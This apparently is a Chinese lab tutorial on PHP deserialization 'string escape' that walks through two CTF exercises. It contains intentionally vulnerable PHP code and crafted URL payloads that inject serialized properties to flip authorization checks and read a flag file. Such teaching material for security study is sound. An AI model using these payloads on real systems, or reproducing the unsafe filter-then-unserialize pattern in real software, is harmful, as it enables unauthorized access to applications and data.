WEB渗透—PHP反序列化(八)

Web渗透—PHP反序列化        课程学习分享(课程非本人制作,仅提供学习分享)


靶场下载地址:GitHub - mcc0624/php_ser_Class: php反序列化靶场课程,基于课程制作的靶场

课程地址:PHP反序列化漏洞学习_哔哩哔_bilibili


十五、字符串逃逸例题-增多

1.实例代码

目标:判断是否pass=='escaping'

<?php
function filter($name){$safe=array("flag","php");$name=str_replace($safe,"hack",$name);return $name;
}
class test{var $user;var $pass='daydream';                  //pass默认值为'daydream'function __construct($user){$this->user=$user;}
}
$param=$_GET['param'];                     //$_GET[‘param’]获取值给$param
$param=serialize(new test($param));        //并放在实例化test里作为参数,实例化触发__construct赋值给user
$profile=unserialize(filter($param));      //对$param值进行安全性检查,filter把”flag”,”php”替换为”hack”,然后在反序列化
if ($profile->pass=='escaping'){           //判断pass是否为'escaping'echo file_get_contents("flag.php");
}
?>

2.解题过程

思路:

        1)字符串过滤后减少还是增多

        2)构造出关键成员属性序列化字符串

        3)增多则判断一次吐出多少个字符串

        4)构造payload并提交

构造关键成员属性序列化字符:

<?php
class test{var $user="123";         //任意字符var $pass='escaping';
}
echo serialize(new test());
?>

O:4:"test":2:{s:4:"user";s:3:"123";s:4:"pass";s:8:"escaping";}

php被替换成hack,字符串增多,会吐出字符串变成结构代码,一个php吐出1个字符串;

flag被替换成hack,字符串不变,无法吐出字符串变成结构代码

";s:4:"pass";s:8:"escaping";}

$user可控,我们通过param参数进行传参,我们需要将$pass及其参数吐出,同时我们需要补全前面$user的序列化结构,所以我们需要吐出29个字符

构造payload:

URL?param=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}

3.回显结果

利用构造的pyload进行参数传递,得到flag(页面无法直接回显,需要查看网页源代码)

ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}

十六、字符串逃逸例题-减少

1.实例代码

目标:判断vip是否为

<?php
function filter($name){$safe=array("flag","php");$name=str_replace($safe,"hk",$name);return $name;
}
class test{var $user;var $pass;var $vip = false ;                     //vip默认值为falsefunction __construct($user,$pass){$this->user=$user;$this->pass=$pass;}
}
$param=$_GET['user'];
$pass=$_GET['pass'];
$param=serialize(new test($param,$pass));
$profile=unserialize(filter($param));      //对$parm值'user'进行安全性检查,filter把'flag','php'替换为'hk',然后在反序列化
if ($profile->vip){                        //判断vip值是否为真echo file_get_contents("flag.php");
}
?>

2.解题过程

思路:

        1)字符串过滤后减少还是增多

        2)构造出关键成员属性序列化字符串

        3)减少则判断吃掉的内容,并计算长度

        4)构造pyload并提交

构造关键成员属性序列化字符:

<?php
class test{var $user = '123';          //任意字符var $pass = '123';          //任意字符var $vip = true;
}
echo serialize(new test());
?>

O:4:"test":3:{s:4:"user";s:3:"123";s:4:"pass";s:3:"123";s:3:"vip";b:1;}

php被替换成hk,字符串减少,会吃掉字符串变成结构代码,一个php吃掉1个字符串;

flag被替换成hk,字符串减少,会吃掉字符串变成结构代码,一个flag吃掉2个字符串

";s:4:"pass";s:3:"123";s:3:"vip";b:1;}

$user和$pass可控,我们通过user和pass参数进行传参,我们需要将$pass及其参数吃掉,只保留参数内容以及结构 " 符号,同时我们需要补全前面$user的序列化结构,所以我们需要吃掉19个字符(flag每次吃掉2个字符,吃19个字符最少要吃10次,所以我们会多吃1位,在后面字符位置补)

在PHP中,当进行序列化时,字符串的长度标识小于两位时会被算作两位的原因是为了确保序列化后的数据能够正确地被反序列化。在PHP的序列化中,字符串的长度使用一个表示字符数的整数来进行标识。

构造payload:

URL?user=flagflagflagflagflagflagflagflagflagflag&pass=1";s:4:"pass";s:3:"123";s:3:"vip";b:1;}

3.回显结果

利用构造的pyload进行参数传递,得到flag(页面无法直接回显,需要查看网页源代码)

ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/543126.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

php拼接xml特殊字符不显示,使用PHP的XML特殊字符

这里不需要编码这些字符. XML字符串可以使用UTF-8或其他编码.根据编码,序列化器将根据需要进行编码.$foo new SimpleXmlElement(<?xml version"1.0" encoding"UTF-8"?>);$foo->addChild(bar, μmol/l, x10 cells/l);echo $foo->asXml();输出…

JBPM工作流入门总结

关于JBPM工作流 1、工作流 工作流是一项分离业务操作和系统流程的技术。工作流由实体(Entity)、参与者(Participant)、流程定义(Flow Definition)、工作流引擎(Engine) 四部分组成。 ① 实体是工作流的主体,是需要随着工作流一起流动的物件(Object)。例如,在一个采购申请批准流…

python打印九九加法表_Python小脚本

1、跑马灯效果跑马灯import osimport timedef main():content人生苦短&#xff0c;我用python....while True:os.system(cls)print(content)time.sleep(0.2)contentcontent[1:]content[0]#if __name____main__:main()2、录入员工姓名及联系方式&#xff0c;并根据姓名进行查询z…

php ues incolde,17秋东财《大学英语2》在线作业三答案

东财《大学英语2》在线作业三试卷总分:100 得分:0一、 单选题 (共 25 道试题,共 100 分)1. My brother is four years older than me and someone I look _____ to, even though he is shorter than me.A. upB. downC. belowD. over满分&#xff1a;4 分2. Newman: I hav…

如何部署 Hyperic ,使得从内网监测外网服务器

2019独角兽企业重金招聘Python工程师标准>>> 环境介绍&#xff1a; 外网服务器&#xff1a; www.InnovateDigital.com 用户名/密码 test/test 内网服务器&#xff1a;192.168.1.125 操作系统都是 Centos 7 64bit 过程&#xff1a; 下载 Hyperic 5.8.5 &#xff0c…

tcp 发送 最大数据量_网络基础知识夯实总结(三):TCP协议

近期分享的网络知识包括HTTP协议、DNS协议、HTTPS协议、TCP协议、IP协议、TCP/IP、Web攻击及其他协议。今天内容是TCP协议。TCP协议1. 传输层2. 作用提供可靠的字节流服务3. 大块数据分割成报文段(segment)4. 三次握手1) 发送端发带SYN标志的数据包给对方。2) 接收端收到后&…

安卓开发语言php,go语言支持安卓开发吗

go语言支持安卓开发。使用golang开发android需要下载安装gomobile&#xff0c;然后有两种开发方式&#xff0c;分别为&#xff1a;1、原生应用开发&#xff1b;2、混合绑定开发。本教程操作环境&#xff1a;windows10系统、GO 1.11.2、thinkpad t480电脑。大概14年的时候go语言…

解决python连接mysql,UTF-8乱码问题

在测试“Bluemix云端数据库服务ClearDB MySQL使用示例———Python开发投票程序”的程序时&#xff0c;从MySQL中读取的中文输出到网页显示都是问号&#xff0c;如下图&#xff1a; 解决方法&#xff1a; 产生乱码问题&#xff0c;通常都是由于几方面的编码不统一导致的&#x…

python伪代码书写规范_代码这样写更优雅(Python 版)(转载)

Python 这门语言最大的优点之一就是语法简洁&#xff0c;好的代码就像伪代码一样&#xff0c;干净、整洁、一目了然。但有时候我们写代码&#xff0c;特别是 Python 初学者&#xff0c;往往还是按照其它语言的思维习惯来写&#xff0c;那样的写法不仅运行速度慢&#xff0c;代码…

php处理ajax post请求超时,php – 如何处理AJAX请求中的会话超时

考虑返回一个http状态为401,一个JSON对象详细说明原因.如果你正在使用jQuery,那么你将会丢失你的error()回调,然后你可以解析你的对象.$.ajax({data: {},dataType: html,success: function(data) {// do whatever here},type: POST,url: myserver.com,error: function(XMLHttpR…

python三元表达式求值_python 三元表达式的 列表推导式 生成器推导式

python中三元表达式的语法如下 if elseresult x if condition else y另外一种三元表达式&#xff0c;比较少见result (x, y)[condition]列表推导式 〉循环python中列表推导式用于使用其他列表创建一个新列表。其基本形式为&#xff1a; [表达式 for 变量 in 列表]list_1_10 …

php 同一行,php – 如何在同一行中对类方法进行多个调用?

通过“ – >”逐个调用类的功能的方式因为该函数返回同一个对象的类.见下面的例子.你会得到这个class Wke {public $type;public $errno;public $msg;public $page;public $template $this;public function notify(){return $this;}public function errorno($error){$this-…

PHP数组

//常用函数//生成随机数echo rand(1,10);//两个参数来确定随机数的范围,必须要两个参数 //日期时间函数var_dump(time());//取当前时间的UNIX时间戳echo date("Y-m-d H:i:s",time());//格式化日期时间戳echo date("Y-m-d H:i:s");//省掉第二个参数&#xf…

pycharm python部署_使用PyCharm配合部署Python的Django框架的配置纪实

安装软件安装 Python 2.7、PyCharm、pip(Python包管理工具)、Django ( pip install Django)部署PyCharm 新建Django工程完成后&#xff0c;其目录如下&#xff1a;子目录MyDjangoProject下表示工程的全局配置&#xff0c;分别为setttings.py、urls.py和wsgi.py,其中setttings.p…

php商品在最少购买,ECSHOP给商品设置最少购买数量的方法

ecshop后台默认没有给商品设置最小起订量或者最少购买量的功能。保哥在使用ecshop做一个商城时&#xff0c;要给商品设置包邮来吸引买家&#xff0c;但又不想买家购买一件产品也给包邮&#xff0c;这样很容易亏本。对于价值较高的商品有一定的利润空间设置包邮是合情合理的&…

Crawler - 如何爬取列表后进行文章的爬取

2019独角兽企业重金招聘Python工程师标准>>> 已知BUG&#xff1a;(version:5) 1-爬取后生成的XML默认编码是Java环境决定导入数据库可能出问题 方法修改xml编码后导入 重点CL 和 CI命令 CL 是爬取List列表 会通过file生成文件 CI 中file是CL执行后生存的File文件 CL…

程序员出差是去干什么_让我来告诉你,35岁以上的人都在干什么!

欢迎关注专栏&#xff1a;里面定期分享Android和Flutter架构技术知识点及解析&#xff0c;还会不断更新的BATJ面试专题&#xff0c;欢迎大家前来探讨交流&#xff0c;如有好的文章也欢迎投稿。Android高级进阶​zhuanlan.zhihu.com让我来告诉你&#xff0c;35岁以上的人都在干什…

oracle v¥bh,【oracle笔记2】约束

约束*约束是添加在列上的&#xff0c;用来约束列的。1. 主键约束(唯一标识)***非空******唯一******被引用***(外键时引用主键)*当表的某一列被指定为主键后&#xff0c;该列就不能为空&#xff0c;不能有重复的出现。*创建表时指定主键的两种方式&#xff1a;>create table…

WAP端 touch事件触发顺序记录

IOS7.0 safari 滚动滚动条的时候, 最后手指放开 (scroll 总是在 touchend后面&#xff0c;所以要用 setTimeout)   touchstart touchmove&#xff08;多个&#xff09; touchend scroll&#xff08;一个&#xff09;IOS8.4 safari 滚动滚动条的时候   touchstart touchmove…

opencv入门_【OpenCV入门之十八】通过形态学操作提取水平与垂直线

小白导读学习计算机视觉最重要的能力应该就是编程了&#xff0c;为了帮助小伙伴尽快入门计算机视觉&#xff0c;小白准备了【OpenCV入门】系列。新的一年文章的内容进行了很大的完善&#xff0c;主要是借鉴了更多大神的文章&#xff0c;希望让小伙伴更加容易理解。如果小伙伴觉…